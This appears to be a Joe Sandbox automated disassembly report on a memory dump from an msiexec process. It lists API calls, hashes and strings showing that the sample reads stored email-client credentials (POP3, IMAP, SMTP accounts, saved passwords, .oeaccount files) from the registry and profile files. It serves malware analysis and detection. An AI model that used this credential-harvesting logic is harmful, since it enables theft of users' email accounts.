                                                                            • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                                                                            • API String ID: 2360744853-2229823034
                                                                            • Opcode ID: fa9f5f1c2ef6f652c20f964ce99d96b8fee6feb6c02ab87e42e45cad748783be
                                                                            • Instruction ID: 1258fd73e7f0479363a75d8e9bd03f7624e4807d7768342ee5bbbb65847b95d7
                                                                            • Opcode Fuzzy Hash: fa9f5f1c2ef6f652c20f964ce99d96b8fee6feb6c02ab87e42e45cad748783be
                                                                            • Instruction Fuzzy Hash: 95418272604605AFE720DAA6CC81F96B3F8EB04314F14497BF95AE7281D738F9548B58
                                                                            APIs
                                                                            • strchr.MSVCRT ref: 004100E4
                                                                            • _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                                              • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                                                              • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                                                              • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                                                            • _mbscpy.MSVCRT(?,00000000,00000000,?,00000000,00000104,00000104), ref: 00410142
                                                                            • _mbscat.MSVCRT ref: 0041014D
                                                                            • memset.MSVCRT ref: 00410129
                                                                              • Part of subcall function 0040715B: GetWindowsDirectoryA.KERNEL32(0045AA00,00000104,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407170
                                                                              • Part of subcall function 0040715B: _mbscpy.MSVCRT(00000000,0045AA00,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407180
                                                                            • memset.MSVCRT ref: 00410171
                                                                            • memcpy.MSVCRT(?,00000000,00000002,00000000,?,00000000,00000104,00000104), ref: 0041018C
                                                                            • _mbscat.MSVCRT ref: 00410197
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
                                                                            • String ID: \systemroot
                                                                            • API String ID: 912701516-1821301763
                                                                            • Opcode ID: f8a886503ef803f3ee0bfd3d9e760fda2e58d4ed4af484f5670658ee78c777d3
                                                                            • Instruction ID: fda7f57b1b0f7358cef9bf297f3eeb801234e423e358f1bd4862c9dba8460d26
                                                                            • Opcode Fuzzy Hash: f8a886503ef803f3ee0bfd3d9e760fda2e58d4ed4af484f5670658ee78c777d3
                                                                            • Instruction Fuzzy Hash: 3721AA7590C28479F724E2618C83FEA679CDB55704F50405FB2C9A51C1EAECF9C5862A
                                                                            APIs
                                                                              • Part of subcall function 00403138: GetPrivateProfileStringA.KERNEL32(00000000,?,0044C52F,?,?,?), ref: 0040315C
                                                                            • strchr.MSVCRT ref: 0040327B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: PrivateProfileStringstrchr
                                                                            • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                                                                            • API String ID: 1348940319-1729847305
                                                                            • Opcode ID: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                                            • Instruction ID: 3c3f6fb7771655520bf9db4259302bbcc59fb1a7701990a2e81aa7d88bec6f27
                                                                            • Opcode Fuzzy Hash: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                                            • Instruction Fuzzy Hash: 6C31A07094024EBEEF119F60CC45FDABF6CAF14319F10806AB59C7A1D1C7B99B948B54
                                                                            APIs
                                                                            • memcpy.MSVCRT(?,&quot;,00000006,?,?,00000000,0040ABBD,?,?), ref: 00411034
                                                                            • memcpy.MSVCRT(?,&amp;,00000005,?,?,00000000,0040ABBD,?,?), ref: 0041105A
                                                                            • memcpy.MSVCRT(?,&lt;,00000004,?,?,00000000,0040ABBD,?,?), ref: 00411072
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memcpy
                                                                            • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                            • API String ID: 3510742995-3273207271
                                                                            • Opcode ID: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                                            • Instruction ID: 550cffa583b2c54ba2aa88b33b5e976ebd7c1d4e5c49a3816a9e471e7c07ee5b
                                                                            • Opcode Fuzzy Hash: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                                            • Instruction Fuzzy Hash: D501D4B2FC86E428FA3006450C46FE74E4547BFB11F350017F78525AA5A09D0DC7816F
                                                                            APIs
                                                                            • memset.MSVCRT ref: 0040F567
                                                                            • memset.MSVCRT ref: 0040F57F
                                                                              • Part of subcall function 004078BA: _mbsnbcat.MSVCRT ref: 004078DA
                                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040F5E2
                                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F6B7
                                                                              • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                                              • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                              • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                            • memcpy.MSVCRT(00000020,?,?,?,00000000,?,?,?,?,?,00000000), ref: 0040F652
                                                                            • LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040F664
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: QueryValuememset$AddressFreeLibraryLoadLocalProc_mbscpy_mbsnbcatmemcpy
                                                                            • String ID:
                                                                            • API String ID: 78143705-3916222277
                                                                            • Opcode ID: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                                                                            • Instruction ID: 8a535e2a1d92942c08e22e27bc62a3a9d9c5418ddd7b2e408e782496f1cf9495
                                                                            • Opcode Fuzzy Hash: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                                                                            • Instruction Fuzzy Hash: 9E81FC218047CEDEDB31DBBC8C485DDBF745B17224F0843A9E5B47A2E2D3245646C7AA
                                                                            APIs
                                                                            • memset.MSVCRT ref: 004094C8
                                                                            • GetDlgCtrlID.USER32(?), ref: 004094D3
                                                                            • GetWindowTextA.USER32(?,?,00001000), ref: 004094E6
                                                                            • memset.MSVCRT ref: 0040950C
                                                                            • GetClassNameA.USER32(?,?,000000FF), ref: 0040951F
                                                                            • _strcmpi.MSVCRT ref: 00409531
                                                                              • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memset$ClassCtrlNameTextWindow_itoa_strcmpi
                                                                            • String ID: sysdatetimepick32
                                                                            • API String ID: 3411445237-4169760276
                                                                            • Opcode ID: d298131e59c589d759801c5718a5716a1bfbc5a0205dba439accd7a9806c0ec0
                                                                            • Instruction ID: 275a188ed2e8c4d5dd974f468a7d06fe6df33147f8fd952053c2ef98a917a35b
                                                                            • Opcode Fuzzy Hash: d298131e59c589d759801c5718a5716a1bfbc5a0205dba439accd7a9806c0ec0
                                                                            • Instruction Fuzzy Hash: 2D11E773C051297EEB129754DC81EEF7BACEF5A315F0400B6FA08E2151E674DE848A64
                                                                            APIs
                                                                            • memset.MSVCRT ref: 00403504
                                                                            • memset.MSVCRT ref: 0040351A
                                                                            • _mbscpy.MSVCRT(00000000,00000000), ref: 00403555
                                                                              • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                              • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                            • _mbscat.MSVCRT ref: 0040356D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: _mbscatmemset$_mbscpystrlen
                                                                            • String ID: InstallPath$Software\Group Mail$fb.dat
                                                                            • API String ID: 632640181-966475738
                                                                            • Opcode ID: 92019086d1fb7d202bc52a9da7d86f13d8a69774ff3458b2053dbeb140317cc9
                                                                            • Instruction ID: a2fd564f6d67a76fe1541fb13c78ccc0c8ee6374decffd3371ae058987aad369
                                                                            • Opcode Fuzzy Hash: 92019086d1fb7d202bc52a9da7d86f13d8a69774ff3458b2053dbeb140317cc9
                                                                            • Instruction Fuzzy Hash: C201FC7694416875E750F6659C47FCAB66CCB64705F0400A7BA48F30C2DAF8BBC486A9
                                                                            APIs
                                                                            • SendMessageA.USER32(?,00001003,00000001,?), ref: 0040B3DC
                                                                            • SendMessageA.USER32(?,00001003,00000000,?), ref: 0040B411
                                                                            • LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040B446
                                                                            • LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040B462
                                                                            • GetSysColor.USER32(0000000F), ref: 0040B472
                                                                            • DeleteObject.GDI32(?), ref: 0040B4A6
                                                                            • DeleteObject.GDI32(00000000), ref: 0040B4A9
                                                                            • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040B4C7
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$DeleteImageLoadObject$Color
                                                                            • String ID:
                                                                            • API String ID: 3642520215-0
                                                                            • Opcode ID: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                                            • Instruction ID: 78997c319ae04cc2c464f68e1b112159c67c6e7e05dd954700a2b997fe6bb290
                                                                            • Opcode Fuzzy Hash: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                                            • Instruction Fuzzy Hash: 5A317275680308BFFA715B70DC87FD6B695EB48B00F104828F3857A1E1CAF279909B68
                                                                            APIs
                                                                            • GetSystemMetrics.USER32(00000011), ref: 004072E7
                                                                            • GetSystemMetrics.USER32(00000010), ref: 004072ED
                                                                            • GetDC.USER32(00000000), ref: 004072FB
                                                                            • GetDeviceCaps.GDI32(00000000,00000008), ref: 0040730D
                                                                            • GetDeviceCaps.GDI32(004012E4,0000000A), ref: 00407316
                                                                            • ReleaseDC.USER32(00000000,004012E4), ref: 0040731F
                                                                            • GetWindowRect.USER32(004012E4,?), ref: 0040732C
                                                                            • MoveWindow.USER32(004012E4,?,?,?,?,00000001,?,?,?,?,?,?,004012E4,?), ref: 00407371
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
                                                                            • String ID:
                                                                            • API String ID: 1999381814-0
                                                                            • Opcode ID: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                                            • Instruction ID: 22bb5f5faf33eb927601db2df5736372c6ae1ca5e65390263d5238b88a5d6584
                                                                            • Opcode Fuzzy Hash: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                                            • Instruction Fuzzy Hash: C611A536E00219AFDF008FF9DC49BAE7FB9EB44311F040175EE05E3290DA70A8418A90
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memcpymemset
                                                                            • String ID: abort due to ROLLBACK$out of memory$statement aborts at %d: [%s] %s$string or blob too big$unknown error
                                                                            • API String ID: 1297977491-3883738016
                                                                            • Opcode ID: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                                            • Instruction ID: e5ed660087d787d4baabea17299805ba1702756b87ddf288a6169370bd8562d9
                                                                            • Opcode Fuzzy Hash: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                                            • Instruction Fuzzy Hash: FA128D75A00629DFCB14DF68E480AADBBB1BF08314F65409BE945AB341D738F981CF99
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: __aulldvrm$__aullrem
                                                                            • String ID: -$-x0$0123456789ABCDEF0123456789abcdef
                                                                            • API String ID: 643879872-978417875
                                                                            • Opcode ID: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                                                            • Instruction ID: 9a4dcd4671c0eaaf570ced65c0a394ff57d12b60ca94b612a12fd923c93321e5
                                                                            • Opcode Fuzzy Hash: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                                                            • Instruction Fuzzy Hash: 09618C315083819FD7218F2886447ABBBE1AFC6704F18495FF8C4D7352D3B8C9998B4A
                                                                            APIs
                                                                            • memset.MSVCRT ref: 0040810E
                                                                              • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                              • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                                              • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                              • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,004082A2,?,000000FD,00000000,00000000,?,00000000,004082A2,?,?,?,?,00000000), ref: 004081A9
                                                                            • LocalFree.KERNEL32(?,?,?,?,?,00000000,679D7B60,?), ref: 004081B9
                                                                              • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                              • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                              • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWide_mbscpymemcpymemsetstrlen
                                                                            • String ID: POP3_credentials$POP3_host$POP3_name
                                                                            • API String ID: 524865279-2190619648
                                                                            • Opcode ID: b5524387b823faeaa267b2a2291d9d9c6f1165028c5fc642f3f58ff6b69592da
                                                                            • Instruction ID: 3679de1ec208362151a8ef0ee52fb8317fff865e06d3e7d86d66f539d2f4ec3f
                                                                            • Opcode Fuzzy Hash: b5524387b823faeaa267b2a2291d9d9c6f1165028c5fc642f3f58ff6b69592da
                                                                            • Instruction Fuzzy Hash: 5331507594021DAFDB11DB698C81EEEBB7CEF59304F0040BAF904A3141D6349A458F64
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: ItemMenu$CountInfomemsetstrchr
                                                                            • String ID: 0$6
                                                                            • API String ID: 2300387033-3849865405
                                                                            • Opcode ID: f43f1b6a3e30ed785ddb3ece00de2359a070e4505b5746840cef8f2021710bea
                                                                            • Instruction ID: cca6cfeb93ac41a34237a001b959014c3c2918908c2e54b2122eb51ea62ba4e3
                                                                            • Opcode Fuzzy Hash: f43f1b6a3e30ed785ddb3ece00de2359a070e4505b5746840cef8f2021710bea
                                                                            • Instruction Fuzzy Hash: CC21AB7240C384AFD710CF61C881A9BB7E8FB89344F44093EF68896292E779DD45CB5A
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: _mbscat$memsetsprintf
                                                                            • String ID: %2.2X
                                                                            • API String ID: 125969286-791839006
                                                                            • Opcode ID: 9c39481db8383895c35f041d5bf0f4fe872cf2cabc6c5cb5cd8df66f0331d79d
                                                                            • Instruction ID: 3c8f4d0594b8058611f6c647f75597c7a5b0e751fa8f3ee8557cc8ef3b8c8270
                                                                            • Opcode Fuzzy Hash: 9c39481db8383895c35f041d5bf0f4fe872cf2cabc6c5cb5cd8df66f0331d79d
                                                                            • Instruction Fuzzy Hash: 93017072D0436425F721AA659C43BAA779CDB84705F10407FF844B62C1EABCFA444B9E
                                                                            APIs
                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,00000000,ACD,00444265,?,?,*.oeaccount,ACD,?,00000104), ref: 004441B0
                                                                            • ??2@YAPAXI@Z.MSVCRT(00000002,?), ref: 004441C2
                                                                            • SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000,?), ref: 004441D1
                                                                              • Part of subcall function 00407560: ReadFile.KERNEL32(00000000,?,004441E4,00000000,00000000,?,?,004441E4,?,00000000), ref: 00407577
                                                                              • Part of subcall function 00444059: wcslen.MSVCRT ref: 0044406C
                                                                              • Part of subcall function 00444059: ??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
                                                                              • Part of subcall function 00444059: WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                              • Part of subcall function 00444059: strlen.MSVCRT ref: 004440D1
                                                                              • Part of subcall function 00444059: memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                                              • Part of subcall function 00444059: ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                                            • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000), ref: 004441FC
                                                                            • CloseHandle.KERNEL32(?), ref: 00444206
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: File$??2@??3@$ByteCharCloseHandleMultiPointerReadSizeWidememcpystrlenwcslen
                                                                            • String ID: ACD
                                                                            • API String ID: 82305771-620537770
                                                                            • Opcode ID: c50c8069a9a8a0753d3fcb8904f6dc24e57909486b41191e56791defa24a5ab0
                                                                            • Instruction ID: 993b87d0760cedec04f170bc8e4db420e9372e17061e8bf8474e84fbc22352e0
                                                                            • Opcode Fuzzy Hash: c50c8069a9a8a0753d3fcb8904f6dc24e57909486b41191e56791defa24a5ab0
                                                                            • Instruction Fuzzy Hash: 9201D836401248BEF7106F75AC8ED9B7BACEF96368710812BF854971A1DA359C14CA64
                                                                            APIs
                                                                            • memset.MSVCRT ref: 004091EC
                                                                            • sprintf.MSVCRT ref: 00409201
                                                                              • Part of subcall function 0040929C: memset.MSVCRT ref: 004092C0
                                                                              • Part of subcall function 0040929C: GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                                                              • Part of subcall function 0040929C: _mbscpy.MSVCRT(?,?), ref: 004092FC
                                                                            • SetWindowTextA.USER32(?,?), ref: 00409228
                                                                            • EnumChildWindows.USER32(?,Function_00009164,00000000), ref: 00409238
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindows_mbscpysprintf
                                                                            • String ID: caption$dialog_%d
                                                                            • API String ID: 2923679083-4161923789
                                                                            • Opcode ID: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
                                                                            • Instruction ID: 6e7d5c99c97eb3a6ca4510ecd50999ddf5df62a663a14868e976e94052726d92
                                                                            • Opcode Fuzzy Hash: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
                                                                            • Instruction Fuzzy Hash: ADF09C706442897EFB12DBA0DD06FC57B689708706F0000A6BB48E50D2D6F89D84872E
                                                                            APIs
                                                                            • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,0040FE66,00000000,?), ref: 004101E6
                                                                            • memset.MSVCRT ref: 00410246
                                                                            • memset.MSVCRT ref: 00410258
                                                                              • Part of subcall function 004100CC: _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                                            • memset.MSVCRT ref: 0041033F
                                                                            • _mbscpy.MSVCRT(?,?,?,00000000,00000118), ref: 00410364
                                                                            • CloseHandle.KERNEL32(?,0040FE66,?), ref: 004103AE
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memset$_mbscpy$CloseHandleOpenProcess
                                                                            • String ID:
                                                                            • API String ID: 3974772901-0
                                                                            • Opcode ID: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
                                                                            • Instruction ID: 1856ef5d95eaf0ecdca85a0e0a2b389725ab0ec505974788b48c76207b2fc2b2
                                                                            • Opcode Fuzzy Hash: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
                                                                            • Instruction Fuzzy Hash: FF510D7190021CABDB11DF95DD85ADEBBB8EB48305F1001AAEA19E3241D7759FC0CF69
                                                                            APIs
                                                                            • wcslen.MSVCRT ref: 0044406C
                                                                            • ??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                              • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433A0
                                                                              • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433BE
                                                                              • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433D9
                                                                              • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443402
                                                                              • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443426
                                                                            • strlen.MSVCRT ref: 004440D1
                                                                              • Part of subcall function 004434FC: ??3@YAXPAX@Z.MSVCRT(?,?,004440DF), ref: 00443507
                                                                              • Part of subcall function 004434FC: ??2@YAPAXI@Z.MSVCRT(00000001,?,004440DF), ref: 00443516
                                                                            • memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                                            • ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                                                                            • String ID:
                                                                            • API String ID: 577244452-0
                                                                            • Opcode ID: 577707887b9d7bbd390cae1504d1f2340da0442234304708d55a86593fe8f1d4
                                                                            • Instruction ID: 3a965f982735d3f8f3afa93a9d35b3cc19a0dc4d5d85c2e22613d8d88a70f0fa
                                                                            • Opcode Fuzzy Hash: 577707887b9d7bbd390cae1504d1f2340da0442234304708d55a86593fe8f1d4
                                                                            • Instruction Fuzzy Hash: 00317971800259AFEF21EF61C881ADDBBB4EF84314F0441AAF40863241DB396F85CF58
                                                                            APIs
                                                                              • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                              • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                            • _strcmpi.MSVCRT ref: 00404518
                                                                            • _strcmpi.MSVCRT ref: 00404536
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: _strcmpi$memcpystrlen
                                                                            • String ID: imap$pop3$smtp
                                                                            • API String ID: 2025310588-821077329
                                                                            • Opcode ID: 508188f4cfb0bf5cabdc99a14187536ad4414849d830173f76bc96666e9cf368
                                                                            • Instruction ID: 0633fc9c76c4ce8560d4ef140e22cd8797028ee620c68f7eda392c6b656e28f7
                                                                            • Opcode Fuzzy Hash: 508188f4cfb0bf5cabdc99a14187536ad4414849d830173f76bc96666e9cf368
                                                                            • Instruction Fuzzy Hash: 1F21B6B25003199BD711DB25CD42BDBB3F99F90304F10006BE749F7181DB78BB458A88
                                                                            APIs
                                                                            • memset.MSVCRT ref: 0040C02D
                                                                              • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                                                                              • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001), ref: 00408EBE
                                                                              • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,00403F8E,0044C530), ref: 00408E31
                                                                              • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                              • Part of subcall function 004076B7: memset.MSVCRT ref: 004076D7
                                                                              • Part of subcall function 004076B7: sprintf.MSVCRT ref: 00407704
                                                                              • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407710
                                                                              • Part of subcall function 004076B7: memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
                                                                              • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407733
                                                                              • Part of subcall function 004076B7: memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
                                                                              • Part of subcall function 004074EA: _mbscpy.MSVCRT(?,?), ref: 00407550
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
